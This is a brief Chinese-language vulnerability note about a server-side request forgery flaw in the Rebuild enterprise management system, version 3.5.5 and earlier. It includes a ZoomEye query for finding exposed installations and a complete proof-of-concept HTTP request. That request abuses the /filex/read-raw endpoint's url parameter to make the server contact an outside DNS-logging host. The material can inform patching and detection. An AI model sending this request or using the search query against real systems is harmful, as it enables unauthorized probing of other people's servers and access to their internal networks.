0x01 产品简介

Rebuild是高度可配置化的企业管理系统！企业内部可免费使用！低代码/零代码快速搭建企业中台、CRM客户关系管理、WMS库存管理、TMS运输管理、SCM供应链管理，外贸管理，甚至是 ERP 企业资源计划！

0x02 漏洞概述

Rebuild 3.5.5 版本存在安全漏洞，该漏洞源于组件 HTTP Request Handler 的 readRawText 函数的 url 参数存在服务器端请求伪造漏洞。

0x03 影响范围

Ruifang-Tech Rebuild <= 3.5.5

0x04 复现环境

钟馗之眼：app:"rebuild"

0x05 漏洞复现

PoC

GET /filex/read-raw?url=http://dnslog.cn&cut=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close